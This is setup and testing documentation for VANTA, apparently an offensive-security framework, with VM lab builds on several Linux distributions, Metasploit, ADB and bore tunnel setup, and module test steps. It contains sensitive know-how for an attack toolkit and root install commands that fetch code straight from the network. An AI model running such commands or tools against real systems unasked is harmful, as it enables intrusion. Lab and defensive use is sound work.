Iterates every module.json in the repo, checks each dependency with which, and prints a per-module table: ✓ Found / ✗ Missing. Any Missing entry means that module's dependent operations will fail at runtime.

Testing Your Module — Bare Metal Integration

All testing is done against real system tools on the live machine. There are no mocks, no stubs, no sandboxes. If a command works in the terminal it should work through VANTA — if it does not, the issue is in the JSON dispatch, the executable path, or a missing dependency.

01
Pipe test directly — no VANTA required
From the module folder: echo '{"target":"127.0.0.1","params":{"port":"22"}}' | python3 portcheck.py. If output looks correct here, the module works. Bugs showing only through VANTA are dispatch bugs, not logic bugs.
02
Verify all deps pass inside VANTA
Launch VANTA, then: info portcheck. Every entry in the manifest's dependencies array must show ✓ Found. ✗ Missing means the binary is not on PATH — install it or add it to optional_dependencies if it is truly optional.
03
Live reload cycle
Edit the module file, then inside VANTA run reload → use portcheck → set port 22 → run 127.0.0.1. Confirm FINDING lines appear and no Python traceback hits stdout (tracebacks break JSON parsing).
04
Cross-module regression check
After adding or changing a module, run an unrelated module (use netrecon → run 127.0.0.1) to confirm the reload did not corrupt the module registry. All previously-working modules must still load cleanly.
05
Scaffold with gen_module.py
python3 gen_module.py asks a series of questions and generates both module.json and a starter Python file with the stdin read, dispatch table, and FINDING pattern already in place.
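Step 01's pipe test can be automated so that every run checks the two things step 03 asks you to confirm by eye: FINDING lines are present and no traceback is on stdout. The harness below is an added example, not code from VANTA or gen_module.py; pipe_test, the two stand-in modules, and the JSON payload after the FINDING: prefix are assumptions made for illustration.

```python
import json
import subprocess
import sys
import tempfile
from pathlib import Path

TRACEBACK_MARK = "Traceback (most recent call last)"

def pipe_test(module_path, target, params, timeout=30):
    """Feed one JSON request to a module on stdin and check its stdout."""
    request = json.dumps({"target": target, "params": params})
    try:
        proc = subprocess.run([sys.executable, str(module_path)], input=request,
                              capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"findings": [], "problems": [f"no exit within {timeout}s"]}
    findings = [ln for ln in proc.stdout.splitlines() if ln.startswith("FINDING:")]
    problems = []
    if TRACEBACK_MARK in proc.stdout:
        problems.append("traceback on stdout")
    if not findings:
        problems.append("no FINDING lines")
    if proc.returncode != 0:
        problems.append(f"exit status {proc.returncode}")
    return {"findings": findings, "problems": problems}

# Constructed stand-in modules, not VANTA code. The payload after the
# FINDING: prefix is an assumption; the harness only relies on the prefix.
GOOD_MODULE = """\
import json, sys
req = json.load(sys.stdin)
print("FINDING: " + json.dumps({"target": req["target"], "port": req["params"]["port"]}))
"""

# Handles the error but prints the traceback to stdout instead of stderr.
BAD_MODULE = """\
import json, sys, traceback
req = json.load(sys.stdin)
try:
    int(req["params"]["port"])
except ValueError:
    traceback.print_exc(file=sys.stdout)
"""

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        good, bad = Path(tmp, "good.py"), Path(tmp, "bad.py")
        good.write_text(GOOD_MODULE)
        bad.write_text(BAD_MODULE)
        return (pipe_test(good, "127.0.0.1", {"port": "22"}),
                pipe_test(bad, "127.0.0.1", {"port": "ssh"}))

if __name__ == "__main__":
    print(demo())
```

An uncaught exception normally writes its traceback to stderr, so the failure this catches is a module that prints the traceback itself or is run with stderr merged into stdout.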

System Health Check — Run This Before Every Session

# ADB — device must appear here before any android_pentest op
adb devices

# Network interfaces — confirm monitor-mode adapter is visible
ip link show
iw dev

# Metasploit DB — must be running for MSF-backed operations
sudo msfdb status

# Bore — confirm the binary is on PATH
bore --version

# VANTA dependency table for all modules
./vanta -check-deps        # prints ✓/✗ for every module's full dep list

# Quick smoke test — localhost recon, should complete in under 5s
echo '{"target":"127.0.0.1","params":{"mode":"quick"}}' \
  | python3 tools/network/netrecon/netrecon.py
PR checklist: module.json validates · dependencies array complete · FINDING: prefix on all structured output · no hardcoded absolute paths · pipe test passes on clean system · info <module> shows all deps as Found · no tracebacks reach stdout · PR title: feat(module): add <name> — <one-line desc>

09 Isolated Lab Environment

VM Setup

A virtual machine gives you a reproducible, snapshot-able VANTA environment isolated from your daily driver. Break it, snapshot it, clone it per engagement. This section builds each supported OS from ISO to a running VANTA install — start to finish, no assumed knowledge.

Bare metal vs VM: Bare metal gives full hardware access — real USB for ADB, physical Wi-Fi card for monitor mode. A VM is better for sandboxed development, repeatable lab builds, and contributors who cannot dedicate a machine. For active Android pentest or wifi_monitor work, prefer bare metal or USB passthrough.

VM Specification — All Distros

CPU
4 virtual cores
Minimum 2 vCPUs. 4 recommended — MSF handler, bore tunnel, python module, and the VANTA shell all compete for CPU during a live engagement.
RAM
8 GB
Hard floor is 4 GB. Metasploit Framework uses ~1 GB at rest. Running android_pentest GUI + msfconsole + bore simultaneously needs 6–8 GB to avoid swap thrash.
DISK
40 GB, thin provision
Use thin/dynamic allocation so the image only occupies actual data on the host. APK builds, DEX files, scan logs, and captured media can grow fast — leave headroom.
NET
Bridged adapter
Bridged gives the VM a real LAN IP visible to target devices. NAT works for internet-only but blocks ADB-over-network and bore tunnel callbacks. Use bridged for any live testing.
USB
USB 3.0 passthrough
For ADB: enable USB 3.0 controller and add a USB filter for your phone's vendor ID in VirtualBox, or use virt-manager device passthrough in QEMU/KVM. Without passthrough, adb devices sees nothing.
BOOT
UEFI
Enable EFI/UEFI in the VM firmware settings. All modern ISO installers expect it. BIOS legacy mode works but produces a different partition layout — the guides below assume UEFI.

Hypervisor — QEMU/KVM vs VirtualBox

QEMU/KVM — Recommended on Linux hosts
Native Linux hypervisor. Near-bare-metal performance via KVM acceleration. USB passthrough via virt-manager device wizard. Snapshots via virsh snapshot-create. Best choice if your host is Linux.
sudo pacman -S qemu-full virt-manager libvirt dnsmasq
sudo systemctl enable --now libvirtd
sudo usermod -aG libvirt,kvm $USER
VirtualBox — Cross-platform alternative
Works on Linux, macOS, and Windows hosts. GUI-driven setup. USB passthrough requires the VirtualBox Extension Pack (free for personal use). Snapshots via Machine → Take Snapshot.
# Arch host
sudo pacman -S virtualbox virtualbox-host-modules-arch
sudo modprobe vboxdrv
sudo usermod -aG vboxusers $USER

Arch Linux — Primary Platform

Arch is the primary VANTA development platform. CachyOS (a real-time kernel Arch fork) is what the core team runs. This is the most involved install but gives you the most control.

Download the ISO from archlinux.org/download. Verify the SHA256 checksum before booting. Create the VM with the specs above, attach the ISO, enable UEFI, set network to Bridged, and boot.

01
Verify boot and internet
loadkeys us to set keyboard layout. Then ping -c3 archlinux.org — this must succeed before continuing. If it fails, check the VM network adapter is set to Bridged.
02
Sync clock and partition
timedatectl set-ntp true then fdisk /dev/vda (QEMU) or /dev/sda (VirtualBox). Inside fdisk: g → GPT table · n → partition 1 +512M → type EFI System (t 1) · n → partition 2 default → Linux filesystem · w → write.
03
Format and mount
mkfs.fat -F32 /dev/vda1 · mkfs.ext4 /dev/vda2 · mount /dev/vda2 /mnt · mkdir -p /mnt/boot/efi · mount /dev/vda1 /mnt/boot/efi
04
Install base system and generate fstab
pacstrap /mnt base linux linux-firmware base-devel sudo nano — takes a few minutes depending on connection speed. Then genfstab -U /mnt >> /mnt/etc/fstab and arch-chroot /mnt to enter the new system.
05
Configure time zone, locale, and hostname
ln -sf /usr/share/zoneinfo/Region/City /etc/localtime · hwclock --systohc · add en_US.UTF-8 UTF-8 to /etc/locale.gen then locale-gen · echo "LANG=en_US.UTF-8" > /etc/locale.conf · echo "vanta-arch" > /etc/hostname
06
Create user with correct groups
passwd (set root password) · useradd -m -G wheel,plugdev,audio,video,storage -s /bin/bash yourname · passwd yourname · EDITOR=nano visudo → uncomment %wheel ALL=(ALL:ALL) ALL. The plugdev group is required for ADB USB access.
07
Install GRUB and enable networking
pacman -S grub efibootmgr networkmanager · grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB · grub-mkconfig -o /boot/grub/grub.cfg · systemctl enable NetworkManager
08
Exit, unmount, and reboot
exit (leaves chroot) · umount -R /mnt · reboot. Remove the ISO from the virtual optical drive before the VM restarts — otherwise it will boot the installer again instead of the new system.
09
Post-reboot: install all VANTA dependencies
Log in as your user, then run the commands below. They cover every dependency for all VANTA modules.
sudo pacman -Syu
sudo pacman -S go python python-pip git nmap masscan android-tools \
               apktool default-jdk metasploit bore jq nodejs \
               aircrack-ng iw wireless_tools imagemagick ffmpeg \
               frida python-requests python-ldap3 python-scapy \
               python-paramiko netexec bloodhound impacket

# MSF database — one time only
sudo msfdb init
msfconsole -q -x "version; exit"

# ADB USB permissions
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="0666", GROUP="plugdev"
EOF
sudo udevadm control --reload-rules && sudo udevadm trigger

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd vanta
bash install.sh
./vanta --version && ./vanta -check-deps

Kali Linux

Kali ships most offensive tools pre-installed, making it the fastest path to a working VANTA lab. The only manual fix required is replacing the outdated packaged Go — Kali frequently ships 1.18 or older, and VANTA requires 1.21+.

Download from kali.org/get-kali → Installer Images → Kali Linux 64-Bit (Installer). Create the VM with the standard specs, attach the ISO, and boot.

01
Graphical installer — step by step
Select Graphical Install · Language: English · Location: your country · Keyboard: English (US) · Hostname: vanta-kali · Domain: leave blank · create a username and password · Partitioning: Guided — use entire disk, all files in one partition · Software: leave defaults ticked · install GRUB to the primary drive · Finish → reboot → remove ISO.
02
Replace system Go with upstream 1.21+
Kali's golang-go package is often 1.18 or older. Download the official Go 1.21 binary, extract to /usr/local/go, and add it to PATH. The commands are in the block below.
03
Install bore and init MSF database
Bore is not in the Kali apt repos — download the pre-built binary. Metasploit is pre-installed but the PostgreSQL database must be initialised once with sudo msfdb init.
04
Clone and install VANTA
bash install.sh detects apt, installs any remaining deps, compiles the binary, writes the ADB udev rule, and runs the dependency verification table.
sudo apt update && sudo apt full-upgrade -y

# Replace outdated Go
wget -q https://go.dev/dl/go1.21.13.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.21.13.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc
go version   # must print go1.21.x or higher

# Bore — not in apt
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# MSF database initialisation (Kali ships MSF pre-installed)
sudo msfdb init
msfconsole -q -x "version; exit"

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd vanta
bash install.sh
./vanta --version && ./vanta -check-deps

Ubuntu / Debian

Ubuntu 24.04 LTS and Debian 12 Bookworm are both supported. Neither ships MSF or offensive tools by default — they must be installed manually. Both also package an outdated Go that must be replaced with the upstream binary.

Downloads: Ubuntu 24.04 LTS from ubuntu.com/download/server (server ISO is lighter) · Debian 12 from debian.org/distrib/netinst.

01
Installer — Ubuntu
Boot ISO → guided install → set hostname vanta-ubuntu · create a user · disk: Erase disk and install (entire disk, one partition) · do not enable LVM unless you know you need it · GRUB to primary drive · reboot, remove ISO.
01
Installer — Debian
Boot ISO → Graphical Install → language, keyboard, hostname vanta-debian · root password · create user · partitioning: Guided — entire disk, all files in one partition · software selection: untick desktop environment, keep SSH server and standard utilities for a headless pentest box · GRUB to primary drive → reboot, remove ISO.
02
Replace system Go and install deps
Ubuntu ships Go 1.21+ from Ubuntu 24.04 onwards — verify with go version before downloading. Debian 12 ships 1.19 — always replace. Use the Rapid7 MSF installer since MSF is not in apt.
sudo apt update && sudo apt full-upgrade -y

# Replace Go if version is below 1.21
go version   # check first — Ubuntu 24.04 may already be 1.21+
wget -q https://go.dev/dl/go1.21.13.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.21.13.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc

# System packages
sudo apt install -y python3 python3-pip git nmap masscan adb apktool \
                    default-jdk jq nodejs aircrack-ng iw wireless-tools \
                    imagemagick ffmpeg smbclient

# Metasploit — Rapid7 official installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  > msfinstall && chmod 755 msfinstall && sudo ./msfinstall
sudo msfdb init

# Python packages
pip3 install requests ldap3 scapy paramiko impacket frida-tools bloodhound \
             --break-system-packages

# Bore
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd vanta
bash install.sh
./vanta --version && ./vanta -check-deps

Fedora

Fedora 40+ ships a sufficiently modern Go in its official dnf repos — no manual replacement needed. Metasploit and apktool are not in the Fedora repos and require separate installation.

Download from fedoraproject.org/workstation — Fedora Workstation 40 ISO. For a headless pentest box, use the Server ISO instead.

01
Anaconda graphical installer
Boot ISO → Install to Hard Drive · Language: English · Installation Summary: set Installation Destination (automatic partitioning on your disk) · Network & Hostname: enable wired, hostname vanta-fedora · Root Account: enable + set password · User Creation: create user, tick Make this user administrator · Begin Installation → reboot → remove ISO.
02
Install apktool manually
apktool is not in the Fedora repos. Download the wrapper script and the JAR from the official GitHub release, place both in /usr/local/bin/, and chmod the wrapper. The commands are in the block below.
03
Install Metasploit via Rapid7 installer
Metasploit is not in the Fedora dnf repos. The official Rapid7 installer handles it as a self-contained Ruby omnibus package. Run the installer script as root, then sudo msfdb init.
sudo dnf update -y

# Core deps — Go is current in Fedora repos
sudo dnf install -y golang python3 python3-pip git nmap jq nodejs \
                    aircrack-ng iw android-tools imagemagick ffmpeg

# apktool — not in Fedora repos, install manually
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
sudo mv apktool /usr/local/bin/ && sudo mv apktool_*.jar /usr/local/bin/apktool.jar
sudo chmod +x /usr/local/bin/apktool

# Metasploit — Rapid7 official installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  > msfinstall && chmod 755 msfinstall && sudo ./msfinstall
sudo msfdb init

# Python packages
pip3 install requests ldap3 scapy paramiko impacket frida-tools

# Bore
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz && sudo mv bore /usr/local/bin/

# ADB udev rule (create plugdev first: it is not a default group on Fedora)
sudo groupadd -f plugdev
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
EOF
sudo udevadm control --reload-rules && sudo udevadm trigger
sudo usermod -aG plugdev $USER

# Clone and install VANTA
git clone https://github.com/0xb0rn3/vanta && cd vanta
bash install.sh
./vanta --version && ./vanta -check-deps
Snapshot immediately after VANTA installs cleanly. In QEMU/KVM: virsh snapshot-create-as vanta-arch clean-install. In VirtualBox: Machine → Take Snapshot → "clean-install". Roll back to this snapshot before each new engagement to start from a known-good state.
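The Bore section and the distro blocks above pipe the bore tarball from releases/latest straight into tar and move the binary into /usr/local/bin as root, and the Go tarball is unpacked the same way, with no integrity check in between. The following is an added example, not part of VANTA or install.sh, that installs a binary from an already-downloaded archive only when its SHA-256 matches a digest you recorded for a pinned release; the function names and the sample archive are constructed here, and no real digest is shown because the page gives none.

```python
import hashlib
import io
import tarfile
import tempfile
from pathlib import Path

def sha256_file(path, chunk=1 << 20):
    """Hex SHA-256 of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()

def install_verified(tarball, expected_sha256, member, dest_dir):
    """Copy `member` out of `tarball` into dest_dir only if the digest matches."""
    actual = sha256_file(tarball)
    if actual != expected_sha256.strip().lower():
        raise ValueError(f"sha256 mismatch for {tarball}: got {actual}")
    with tarfile.open(tarball, "r:gz") as tar:
        info = tar.getmember(member)      # exact name only, KeyError if absent
        if not info.isfile():             # refuse symlinks, devices, directories
            raise ValueError(f"{member} is not a regular file")
        data = tar.extractfile(info).read()
    # Write the bytes ourselves so archive paths never choose the destination.
    dest = Path(dest_dir) / Path(member).name
    dest.write_bytes(data)
    dest.chmod(0o755)
    return dest

def build_sample_tarball(path, payload=b"#!/bin/sh\necho constructed\n"):
    """Constructed stand-in for a release archive holding one file named bore."""
    info = tarfile.TarInfo("bore")
    info.size = len(payload)
    with tarfile.open(path, "w:gz") as tar:
        tar.addfile(info, io.BytesIO(payload))

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        tarball = Path(tmp, "bore.tar.gz")
        build_sample_tarball(tarball)
        # Real use: the digest recorded for the pinned release, obtained
        # separately from the download itself. Here it is computed locally.
        pinned = sha256_file(tarball)
        installed = install_verified(tarball, pinned, "bore", tmp).read_bytes()
        try:
            install_verified(tarball, "0" * 64, "bore", tmp)
            rejected = False
        except ValueError:
            rejected = True
        return installed, rejected

if __name__ == "__main__":
    print(demo())
```

Pinning a release tag instead of latest is what makes a recorded digest meaningful; for the Go tarball, go.dev/dl lists the SHA-256 of each file next to its download link.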